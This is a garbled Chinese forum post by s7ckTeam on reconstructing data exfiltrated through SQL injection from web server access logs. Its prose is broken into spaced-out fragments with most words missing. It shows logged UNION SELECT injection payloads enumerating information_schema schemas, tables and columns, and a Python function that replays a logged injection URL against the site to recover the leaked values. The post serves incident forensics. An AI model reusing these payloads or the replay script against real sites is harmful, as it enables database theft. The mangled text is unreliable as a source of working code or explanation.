[1051] 2021-04-06_从Web日志还原SQL注入拖走的数据

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-16
2021-04-06_从Web日志还原SQL注入拖走的数据 W e b S Q L   B y p a s s   B y p a s s   2 0 2 1 - 0 4 - 0 6 S Q L 使 u r l W e b 访 S Q L 访 访 u r l 0 1 S Q L P H P + M y S q l G E T s q l 使 S Q L a c c e s s . l o g 访 U n i o n U n i o n 0 2 a c c e s s . l o g u r l _ p a t h u r l H T T P d e m o d e m o S Q L 0 3 W e b G E T P O S T W e b S Q L S Q L S Q L S Q L 1 2 7 . 0 . 0 . 1   -   -   [ 0 4 / A p r / 2 0 2 1 : 1 9 : 5 5 : 1 4   + 0 8 0 0 ]   " G E T   / t e s t . p h p ? i d = 1 + a n d + 1 % 3 D 2 + u n i o n + s e l e c t + 1 % 2 C 2 % 2 C c o n c a t % 2 8 0 x 7 1 7 7 6 5 7 E % 2 C s c h e m a _ n a m e % 2 C 0 x 7 E 7 1 7 7 6 5 % 2 9 + f r o m + i n f o r m a t i o n _ s c h e m a . s c h e m a t a   H T T P / 1 . 1 "   2 0 0   3 2 9 1 2 7 . 0 . 0 . 1   -   -   [ 0 4 / A p r / 2 0 2 1 : 1 9 : 5 5 : 1 7   + 0 8 0 0 ]   " G E T   / t e s t . p h p ? i d = 1 + + u n i o n + s e l e c t + 1 % 2 C 2 % 2 C c o n c a t % 2 8 0 x 7 1 7 7 6 5 7 E % 2 C t a b l e _ n a m e % 2 C 0 x 7 E 7 1 7 7 6 5 % 2 9 + f r o m + i n f o r m a t i o n _ s c h e m a . t a b l e s + w h e r e + t a b l e _ s c h e m a % 3 D % 2 7 t e s t % 2 7   H T T P / 1 . 1 "   2 0 0   2 1 9 1 2 7 . 0 . 0 . 1   -   -   [ 0 4 / A p r / 2 0 2 1 : 1 9 : 5 5 : 2 1   + 0 8 0 0 ]   " G E T   / t e s t . p h p ? i d = 1 + + u n i o n + s e l e c t + 1 % 2 C 2 % 2 C c o n c a t % 2 8 0 x 7 1 7 7 6 5 7 E % 2 C c o l u m n _ n a m e % 2 C 0 x 7 E 7 1 7 7 6 5 % 2 9 + f r o m + i n f o r m a t i o n _ s c h e m a . c o l u m n s + w h e r e + t a b l e _ n a m e % 3 D % 2 7 a d m i n % 2 7   H T T P / 1 . 1 "   2 0 0   2 4 7 d e f   s q l _ l o g _ a n a l y s i s ( p a t h , p a t t e r n ) :     c o m   =   r e . c o m p i l e ( p a t t e r n , r e . I )     k e y s   =   c o m . f i n d a l l ( u n q u o t e ( p a t h ) )     a   =   k e y s [ 0 ] [ 0 ] . r e p l a c e ( " 0 x " , " " ) . d e c o d e ( ' h e x ' )     b   =   k e y s [ 0 ] [ 2 ] . r e p l a c e ( " 0 x " , " " ) . d e c o d e ( ' h e x ' )     u r l   =   d o m a i n _ n a m e + p a t h     r e s p o n s e   =   r e q u e s t s . g e t ( u r l )     p a t t e r n   =   a + r " ( . * ? ) " + b     c o m 2 =   r e . c o m p i l e ( p a t t e r n )         f i n d _ l i s t = c o m 2 . f i n d a l l ( r e s p o n s e . c o n t e n t )     i f   l e n ( f i n d _ l i s t ) > 0 :         r e t u r n   k e y s , f i n d _ l i s t
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则